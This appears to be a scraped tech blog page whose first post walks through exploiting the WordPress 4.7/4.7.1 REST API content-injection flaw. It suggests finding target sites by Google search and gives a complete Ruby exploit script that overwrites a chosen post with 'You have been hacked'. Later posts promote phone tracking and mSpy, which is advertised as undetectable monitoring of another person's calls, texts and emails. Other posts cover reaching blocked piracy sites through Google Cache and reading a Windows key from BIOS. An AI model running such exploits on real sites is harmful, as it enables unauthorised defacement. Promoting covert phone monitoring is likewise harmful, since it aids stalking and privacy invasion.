WordPress REST API Exploit Step by Step

Vulnerability                     Unauthenticated Page/Post Content Modification via REST API
Vulnerable WP Versions : 4.7 and 4.7.1
Vulnerability Description: If the website is not patched, the vulnerability could allow a malicious attacker to modify the content of his post or page on a WP site.

Patched Version              : 4.7.2

Additional Info                     : REST API was added in WP 4.4 released on Dec 2015, however you need plugins to activate API. Later in WP 4.7 version, no plugins are needed, it comes enabled by default. This vulnerability is specific to REST API, hence 4.7.0 and 4.7.1 are directly affected by this vulnerability as API is enabled by default.

 

In this demonstration, we are showing you the exact steps to exploit WordPress websites running vulnerable version 4.7 and 4.7.1. And the tool that I am using here is Advanced Rest Client Chrome add-on.

 

STEP 1: Find OUT Website Running Wordpress

Google is your door, search for something similar to this and I got on hands plenty of WP websites.

However, we are not going to try on any of those websites, of course I do not want to trouble someone or get into trouble as well. I am going to demonstrate on my local WordPress for you. And this is the page that we are going to change content without any authorization.

 

STEP 2: Find VULNERABLE WordPress

View page source of the website to identify the running WP Version. If the version is either 4.7 or 4.7.1, then the website is vulnerable and you can proceed further.

 

STEP 3: Identify WP Post ID

Each post in WP is associated with a unique post ID, which is its reference. You need to find out using REST API Client. Here 3 is the post ID of the page shown in STEP 1.

 

STEP 4: Execute Now

You should mention your post ID in the api link. here I mentioned my Post ID 3 as ?id=3ABC

And we got the website hacked!

 

Alternately  you can use following exploit Code 

require ‘rest-client’
require ‘json’
puts “Enter Target URI (With wp directory)”
targeturi = gets.chomp
puts “Enter Post ID”
postid = gets.chomp.to_i
response = RestClient.post(
“#{targeturi}/index.php/wp-json/wp/v2/posts/#{postid}”,
{
“id” => “#{postid}justrawdata”,
“title” => “You have been hacked”,
“content” => “Hacked please update your wordpress version”
}.to_json,
:content_type => :json,
:accept => :json
) {|response, request, result| response }
if(response.code == 200)
puts “Done! ‘#{targeturi}/index.php?p=#{postid}'”
else
puts “This site is not Vulnerable”
end

source: exploit-db

Track your lost Android mobile phone – XtraSEC free android security

I found today a fantastic software to track your lost phone, that too for free!. There is commercial version but still you can perform most of the tasks in free version, XtraSEC

WhiteBox Premium App Site Template

Step 1: Use Login button in XtraSEC website to register your Gmail account.

Step 2: Install XtraSEC app on your android phone

Step 3: Login to your app with the registered gmail account, provide your alternate mobile phone number and allow necessary permissions. (Alternate mobile phone number is necessary to send commands to your lost phone via SMS)

Step 4: You need to create a PIN so that no one can change settings of this app if your phone is stolen.

I was amazed to read all their features provided by XtraSEC

  • Get you phone location and displayed in Google Maps.
  • Remotely capture photo from your phone camera.You can choose either use front or back camera. Captured camera will be sent to registered your email address.
  • Remotely turn off/on WIFI, 3G
  • Remotely wipe phone and memory card data
  • Phone capture

SMS Commands List

mSpy – track mobile phone calls, text messages and many more

mSpy – you can remotely track all activity that takes place on the monitored phone, from calls to calendar updates. Call history, text messages, emails, call recordings… all immediately sent from the tracked phone right to your secure online account! mSpy claims that they are 100% undetectable. Read more

You can look at the compatible phone models – Android, iOS and Blackberry

mspy

 

 

Easy way to access blocked websites

You must be familiar with Google Cache.  If not, a two line description can explain it well.

Google takes snapshot of each page it scans and caches that version in their server. This cached website (Google Cache) is used by Google to decide if the website is relevant to your search query.

So if a website is blocked by your ISP due to some local law enforcement, you can still access these blocked websites using Google Cache option. Lets look at it.

In the country where I am currently living, piratesbay-torrents are blocked.

website blocked

Inorder to access such blocked websites, all you need to do is instead of directly browsing to thepiratebay.sx, choose ‘Cached’ option in the drop down menu in the Google Search.

 

Google Cache

 

So with the help of Google Cache, I am now able to view the contents of the Pirate Bay, though it is blocked by ISP.

Google Cache Website

Alternate method is using Google Cache tool. One most easy tool is – cache.nevkontakte.com. Actually they are providing you results from Google Cache only.

Enjoy accessing blocked websites!

Retrieve Windows 8 Key encrypted in BIOS

Microsoft moves Windows 8 OEM Product Key to BIOS embedded. The product keys are no more sticked on the computer. You will only see a Windows 8 logo sticker and nothing else. So if you reinstall Windows 8, no need to hunt for the key, the installation will automatically pick up the key from BIOS, provided you install the same version of Windows 8 OEM that came along with the laptop.

So how to retrieve the key from the BIOS.

1. Download 32 or 64-bit version of RWEverything

2. Click ACPI and then MSDM to view Key encrypted in BIOS

RWEverything